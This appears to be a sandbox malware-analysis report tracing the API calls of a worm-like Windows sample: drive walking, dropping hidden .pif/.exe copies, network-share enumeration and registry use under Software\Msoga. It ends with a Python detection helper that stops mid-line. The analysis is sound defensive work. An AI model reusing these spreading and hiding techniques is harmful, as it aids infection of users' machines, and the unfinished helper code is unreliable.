• lstrcpy.KERNEL32(?,00000000), ref: 00901B29
• lstrcat.KERNEL32(?,008F3D50), ref: 00901B38
• lstrcpy.KERNEL32(?,?), ref: 00901B76
• lstrlen.KERNEL32(?), ref: 00901B83
• lstrcat.KERNEL32(?,008F3D54), ref: 00901BA2
• lstrlen.KERNEL32(?), ref: 00901BAF
• lstrcat.KERNEL32(?,.tmp), ref: 00901BD1
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
• String ID: .tmp
• API String ID: 2671286937-2986845003
• Opcode ID: b39e986a2e2ff3c81773ef74f0c6225223c3e51338da550391759fe375359247
• Instruction ID: b4ecaca4a21e7c4533e07bcfa9dd369c30c63b81ed6450e0be4a7eca8d5480fd
• Opcode Fuzzy Hash: b39e986a2e2ff3c81773ef74f0c6225223c3e51338da550391759fe375359247
• Instruction Fuzzy Hash: E4919071900628EFDF20DF64DC88BAB77B9BF44302F008699E619A72D0D7769A85CF50

Control-flow Graph (legend: Executed, Not Executed)
APIs
• Sleep.KERNEL32(0001D4C0), ref: 008F9EFE
• Sleep.KERNEL32(00001000), ref: 008F9F0B
• LoadLibraryA.KERNEL32(008F27C0), ref: 008F9F4D
• GetProcAddress.KERNEL32(00000000,008F27D0), ref: 008F9F6A
• GetProcAddress.KERNEL32(00000000,008F27E0), ref: 008F9F8E
• GetProcAddress.KERNEL32(00000000,008F27F0), ref: 008F9FB2
• RtlExitUserThread.NTDLL(00000000), ref: 008FA14B
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
• String ID: C:\Windows\system32\drivers\lrohpn.sys
• API String ID: 3711489173-4176201111
• Opcode ID: c3821d58994713df52831b83d85a1fd9c1375425493c8e4bb381c56db1c531ea
• Instruction ID: 590dcbcf7aa94452df0cfea36c4b4d58ef7bb6aef2efbda6ccbed55a685086fa
• Opcode Fuzzy Hash: c3821d58994713df52831b83d85a1fd9c1375425493c8e4bb381c56db1c531ea
• Instruction Fuzzy Hash: 786180B5A15208FFEB14EBB4EC4DB6A33B8FB18711F104216E70AD22A1DB755984DB12

Control-flow Graph (legend: Executed, Not Executed)
APIs
• Sleep.KERNEL32(00001000), ref: 00903976
• lstrcpy.KERNEL32(00000000,008F2714), ref: 0090398B
• LoadLibraryA.KERNEL32(00000000), ref: 009039A2
• GetProcAddress.KERNEL32(00000000,008F2700), ref: 009039C4
• FreeLibrary.KERNEL32(00000000), ref: 009039DF
• lstrcat.KERNEL32(00000000,008F22B0), ref: 009039F2
• LoadLibraryA.KERNEL32(00000000), ref: 009039FF
• GetProcAddress.KERNEL32(00000000,008F2700), ref: 00903A21
• CreateThread.KERNEL32(00000000,00000000,00903062,00000000,00000000,00000000), ref: 00903A49
• CreateThread.KERNEL32(00000000,00000000,Function_00031E9B,00000000,00000000,?), ref: 00903A70
• Sleep.KERNEL32(00000400), ref: 00903A84
• Sleep.KERNEL32(00000400), ref: 00903AAA
• CreateThread.KERNEL32(00000000,00000000,Function_00031CE3,0000005A,00000000,?), ref: 00903AD6
• Sleep.KERNEL32(00000400), ref: 00903AEC
• Sleep.KERNEL32(000DBBA0), ref: 00903B13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                                                                                            • String ID: Z
                                                                                                            • API String ID: 4104366077-1505515367
                                                                                                            • Opcode ID: ea8b1e013df518d86dae7678b9a1fa907fa0ac802826bbfcd4515a6dee0531ce
                                                                                                            • Instruction ID: 9e6160d9d2fed33ff964f267f937c2ebbeda956e3e8afd62adc6a116103d25ad
                                                                                                            • Opcode Fuzzy Hash: ea8b1e013df518d86dae7678b9a1fa907fa0ac802826bbfcd4515a6dee0531ce
                                                                                                            • Instruction Fuzzy Hash: F7519175A40244EFEB21AB60EC09BE97778FB48702F008696F349A61D0C7F45AC4CF65

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Msoga), ref: 008F4B6C
                                                                                                            • lstrlen.KERNEL32(00000000,\%d,656E6F6A), ref: 008F4B90
                                                                                                            • wsprintfA.USER32 ref: 008F4B9E
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 008F4BC1
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 008F4BDE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                            • String ID: Software\Msoga$\%d$joneC:\Windows\
                                                                                                            • API String ID: 4004410694-4125127941
                                                                                                            • Opcode ID: 6131d4043fd67a17cfe172288427bf4a92312239efa0eabab191996f6b6e9a02
                                                                                                            • Instruction ID: b4fb7eaad41a111781d096f8a33fd9ac32d8007b08b9ee199f9b482bd945406e
                                                                                                            • Opcode Fuzzy Hash: 6131d4043fd67a17cfe172288427bf4a92312239efa0eabab191996f6b6e9a02
                                                                                                            • Instruction Fuzzy Hash: B1616B7590421CAFDB28DF64CC59BEAB778FB58705F1081DAE309A6241D7B09AC4CF90

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(00909050), ref: 008F63CD
                                                                                                            • IsBadWritePtr.KERNEL32(?,-00000008), ref: 008F6741
                                                                                                            • wsprintfA.USER32 ref: 008F67A0
                                                                                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008F67B7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F686F
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 008F6883
                                                                                                            • RtlLeaveCriticalSection.NTDLL(00909050), ref: 008F6960
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalGlobalSection$AllocEnterFreeLeaveWritelstrlenwsprintf
                                                                                                            • String ID: purity_control_%x$purity_control_%x
                                                                                                            • API String ID: 2588801185-2962537068
                                                                                                            • Opcode ID: c58f97efcd79e20a91049637bae17f794d909c672dd19c66dea4bcb523d109c0
                                                                                                            • Instruction ID: b849127a8a4b62ddc079126e6f9644ce1690bd45495e2225dd0cafc0abaaef15
                                                                                                            • Opcode Fuzzy Hash: c58f97efcd79e20a91049637bae17f794d909c672dd19c66dea4bcb523d109c0
                                                                                                            • Instruction Fuzzy Hash: E6026EB190421C9BCB20CF64CC94FEA7B75FF95344F0482A9E649DB241E772AA90CF90

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Msoga), ref: 008F57FD
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 008F581D
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 008F5845
                                                                                                            • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 008F5896
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 008F5BFB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateEnumOpenValuelstrcpy
                                                                                                            • String ID: %c%d_%d$%c%d_%d$Software\Msoga$joneC:\Windows\
                                                                                                            • API String ID: 4133318789-2016879794
                                                                                                            • Opcode ID: 092e80cd27dcf92a7fe675b1ba65eaef3025a7c156c0effb591b2b8f2738b628
                                                                                                            • Instruction ID: ce6bf6037a2497ca3fa7c477af45129ff5299365b34885a49073fffff96912ba
                                                                                                            • Opcode Fuzzy Hash: 092e80cd27dcf92a7fe675b1ba65eaef3025a7c156c0effb591b2b8f2738b628
                                                                                                            • Instruction Fuzzy Hash: 95C1F67090562CEBDB24CF64DC88BE9B7B5FB58314F2082D9D60AA6250D7749EC5CF90

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 0090457F
                                                                                                            • WSAStartup.WS2_32(00000002,?), ref: 0090458E
                                                                                                            • RtlInitializeCriticalSection.NTDLL(00909030), ref: 00904599
                                                                                                            • RtlInitializeCriticalSection.NTDLL(00909018), ref: 009045A4
                                                                                                            • RtlInitializeCriticalSection.NTDLL(00909050), ref: 009045AF
                                                                                                              • Part of subcall function 00903B60: LoadLibraryA.KERNEL32(008F2154), ref: 00903C13
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F278C), ref: 00903C36
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F27A0), ref: 00903C4E
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F27B0), ref: 00903C67
                                                                                                              • Part of subcall function 00903B60: LoadLibraryA.KERNEL32(008F2894), ref: 00903C79
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28D8), ref: 00903C9C
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28B0), ref: 00903CB5
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28C4), ref: 00903CCD
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28A0), ref: 00903CE6
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 009045D2
                                                                                                              • Part of subcall function 008F41C6: RtlEnterCriticalSection.NTDLL(00909030), ref: 008F41D6
                                                                                                              • Part of subcall function 008F41C6: RtlLeaveCriticalSection.NTDLL(00909030), ref: 008F4260
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 009045F9
                                                                                                              • Part of subcall function 008F41C6: CloseHandle.KERNEL32(00000000), ref: 008F4247
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 00904620
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 00904647
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0090466E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 00904695
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 009046BC
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 009046E3
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0090470A
                                                                                                            • Sleep.KERNEL32(00000200), ref: 00904727
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                                                                                            • String ID:
                                                                                                            • API String ID: 3135310872-0
                                                                                                            • Opcode ID: af16f2998d0a13522ffdaaaf0dcbf464f6386a0af0635ce21c06d9e9d6f1ebe9
                                                                                                            • Instruction ID: 04fecc9a656ce15dd7de044a2455e3667314d167c5ee8c79cfb52d6e2c895bcf
                                                                                                            • Opcode Fuzzy Hash: af16f2998d0a13522ffdaaaf0dcbf464f6386a0af0635ce21c06d9e9d6f1ebe9
                                                                                                            • Instruction Fuzzy Hash: 1E41AC72BC13447BFA20A7E09C1FFEA3728AB54F01F600156B709FD1D1AAF46584866A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
Similarity
• API ID: fprintf$exitfcloseferrorfopenfreadprintf
• String ID: %08lX$%08lX$error closing file "%s"!$error opening file "%s"!
• API String ID: 2944818142-1845245923
• Opcode ID: e36d5907007ee0041133627587ae2a60bef19a6af6977e502c7b128faa41c581
• Instruction ID: d5546c47a0f02ada54b3eb7de5c41582f6d8601c2005f4542d6517f97f497720
• Opcode Fuzzy Hash: e36d5907007ee0041133627587ae2a60bef19a6af6977e502c7b128faa41c581
• Instruction Fuzzy Hash: B54144B1E00108EBDB04DBA8D985BAE77B9AB08318F104576F615FB7D0E239AE409759
APIs
• WNetEnumResourceA.MPR(?,?,?,?), ref: 00901A92
• lstrcpy.KERNEL32(?,00000000), ref: 00901B29
• lstrcat.KERNEL32(?,008F3D50), ref: 00901B38
• lstrcpy.KERNEL32(?,?), ref: 00901B76
• lstrlen.KERNEL32(?), ref: 00901B83
• lstrcat.KERNEL32(?,008F3D54), ref: 00901BA2
• lstrlen.KERNEL32(?), ref: 00901BAF
• lstrcat.KERNEL32(?,.tmp), ref: 00901BD1
• lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 00901C2C
  • Part of subcall function 00901060: Sleep.KERNEL32(?,?), ref: 009010BF
  • Part of subcall function 00901060: lstrcat.KERNEL32(?,008F3D20), ref: 009010DD
• DeleteFileA.KERNEL32(?), ref: 00901C4B
• Sleep.KERNEL32(00001000), ref: 00901C71
• Sleep.KERNEL32(00002000), ref: 00901C92
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
• String ID: .tmp
• API String ID: 3940331287-2986845003
• Opcode ID: c8e7e2777de983ac017571e66ce5cbb3efc11308a5f60ca671fa1775e849b863
• Instruction ID: 777ba9b9690906ec5f26ccb3f20416f4b34d4d00e51372c18f27bd96866f26ae
• Opcode Fuzzy Hash: c8e7e2777de983ac017571e66ce5cbb3efc11308a5f60ca671fa1775e849b863
• Instruction Fuzzy Hash: A2418C75A00628AFDF24DF64DC89FAB7B79BF44302F408588E50997191D735DA86CF50
APIs
• Sleep.KERNEL32(00004E20), ref: 00903210
• GetLogicalDrives.KERNEL32 ref: 00903220
• GetDriveTypeA.KERNEL32(?), ref: 009032A3
• lstrcat.KERNEL32(?,008F2740), ref: 009032CA
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 009032E6
• GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0090331B
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0090332F
• ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 00903391
• CharLowerA.USER32(?), ref: 0090339E
• lstrlen.KERNEL32(?), ref: 009033AB
• lstrcpy.KERNEL32(?,00000000), ref: 00903479
• GetFileAttributesA.KERNEL32(?), ref: 00903486
• CloseHandle.KERNEL32(?), ref: 00903498
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 009034B4
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 009034E7
• CloseHandle.KERNEL32(000000FF), ref: 009034F4
• SetFileAttributesA.KERNEL32(?,00000007), ref: 00903503
• CloseHandle.KERNEL32(000000FF), ref: 0090351C
• GetFileAttributesA.KERNEL32(?), ref: 00903529
• SetFileAttributesA.KERNEL32(?,00000020), ref: 00903547
• DeleteFileA.KERNEL32(?), ref: 00903554
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0090357F
• GetSystemTime.KERNEL32(?), ref: 0090359F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 009035C8
• lstrcat.KERNEL32(?,.pif), ref: 0090362B
• lstrcat.KERNEL32(?,.exe), ref: 0090363F
• lstrlen.KERNEL32(?,?,00000000), ref: 0090366B
• WriteFile.KERNEL32(?,?,00000000), ref: 00903680
• SetFileTime.KERNEL32(?,?,?,?), ref: 009036A2
• CloseHandle.KERNEL32(?), ref: 009036AF
• SetFileAttributesA.KERNEL32(?,00000007), ref: 009036BE
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 009036DA
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0090370D
• CloseHandle.KERNEL32(000000FF), ref: 0090371A
• SetFileAttributesA.KERNEL32(?,00000007), ref: 00903729
• Sleep.KERNEL32(00001B58), ref: 00903739
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
• String ID: :$\
• API String ID: 3104407473-1166558509
• Opcode ID: df6b5775977628b4a81a40ce4545df522d85cbae3d523c863cf7caf099063947
• Instruction ID: 88b04b89ff2d5d49c9b544c0c1509a14f8c558021219009753e2849a164152cb
• Opcode Fuzzy Hash: df6b5775977628b4a81a40ce4545df522d85cbae3d523c863cf7caf099063947
• Instruction Fuzzy Hash: 13517B759006A99FDF24DB64CC84AEEB77ABF85301F0482D9E109EA190E7349FA5CF10
APIs
• Sleep.KERNEL32(00001000,?,?,?,00000000,00908090,008F3FF8,000000FF,?,00903AFC,80000001), ref: 009017D9
• wsprintfA.USER32 ref: 009017F8
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0090181A
• RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 00901894
• lstrlen.KERNEL32(?), ref: 009018C4
• lstrlen.KERNEL32(00000000), ref: 009018D0
• Sleep.KERNEL32(00000400), ref: 00901912
• RegCloseKey.ADVAPI32(?), ref: 00901928
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
• String ID: %s%s
• API String ID: 1665585142-3252725368
• Opcode ID: 105b3b7216370df613b9403cc64fd3796491085e6bbce759a8dd1eb534b20b62
• Instruction ID: f291d40bf82c4f37e04c909cb87568799dd871c4c3652266a07307bda0cbfd66
• Opcode Fuzzy Hash: 105b3b7216370df613b9403cc64fd3796491085e6bbce759a8dd1eb534b20b62
• Instruction Fuzzy Hash: C7515371D01218AFDB20DBA4DC98BEAB7B8FF48704F004699E619A7290DB795A84CF50
APIs
• CreateFileA.KERNEL32(C:\Windows\npqqe.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008F5637
• GetFileSize.KERNEL32(000000FF,00000000), ref: 008F5659
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 008F5691
• ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 008F56BB
• lstrcpy.KERNEL32(00000000,C:\Windows\npqqe.log), ref: 008F56CD
• lstrlen.KERNEL32(00000000,00000000), ref: 008F56E1
• CloseHandle.KERNEL32(000000FF), ref: 008F5725
• GlobalFree.KERNEL32(00000000), ref: 008F5755
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
• String ID: C:\Windows\npqqe.log
• API String ID: 1499523542-2406171112
• Opcode ID: 13410aa29157c4a09d8bb0631ec8ae28d6552e0e3714c8ddacdd88b8512230e7
• Instruction ID: 7b4cec933094a5ba58c473e8fa1571a979cd2937148eca509dbf3714df0e54f5
• Opcode Fuzzy Hash: 13410aa29157c4a09d8bb0631ec8ae28d6552e0e3714c8ddacdd88b8512230e7
• Instruction Fuzzy Hash: A94168B594022CEBDF20DBA4CC8DBDAB778BB54300F1046D9E319A6291DBB51AC4CF90
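The three entries above (the drive-walk routine at 00903210, the registry enumeration at 009017D9 and the read of C:\Windows\npqqe.log at 008F5637) give every CreateFileA, SetFileAttributesA, RegOpenKeyExA and Sleep argument as a raw hex constant, which is what an analyst has to decode by hand to see that the routine opens files GENERIC_WRITE with OPEN_ALWAYS, sets READONLY|HIDDEN|SYSTEM and appends .pif/.exe. The following Python helper is an added example and not part of the Joe Sandbox report or its IDA plugin: it parses lines in the report's own `• Api.MODULE(args), ref: ADDR` format, renders the documented Win32 constants symbolically, and flags the drive-enumeration-plus-hidden-executable sequence. The embedded sample lines are copied from the entries above; the function names and the matching rules in `flag_drive_dropper` are my own assumptions, not anything the report defines.

```python
"""Decode the Win32 constants in a Joe Sandbox 'APIs' listing and flag the drive-walk
plus hidden-executable-drop sequence.  Added example, not Joe Sandbox code."""
from __future__ import annotations
import re
from typing import NamedTuple

# Constructed sample: lines copied from the report entries above ('?' is the
# sandbox's own marker for an argument it could not resolve).
SAMPLE_TRACE = r"""
• Sleep.KERNEL32(00004E20), ref: 00903210
• GetLogicalDrives.KERNEL32 ref: 00903220
• GetDriveTypeA.KERNEL32(?), ref: 009032A3
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 009032E6
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 009034B4
• SetFileAttributesA.KERNEL32(?,00000007), ref: 00903503
• SetFileAttributesA.KERNEL32(?,00000020), ref: 00903547
• lstrcat.KERNEL32(?,.pif), ref: 0090362B
• lstrcat.KERNEL32(?,.exe), ref: 0090363F
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0090181A
  • Part of subcall function 00901060: Sleep.KERNEL32(?,?), ref: 009010BF
• CreateFileA.KERNEL32(C:\Windows\npqqe.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008F5637
"""

# "• Api.MODULE(arg,...), ref: ADDR"; argument-less lines and sub-call lines are accepted too.
_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
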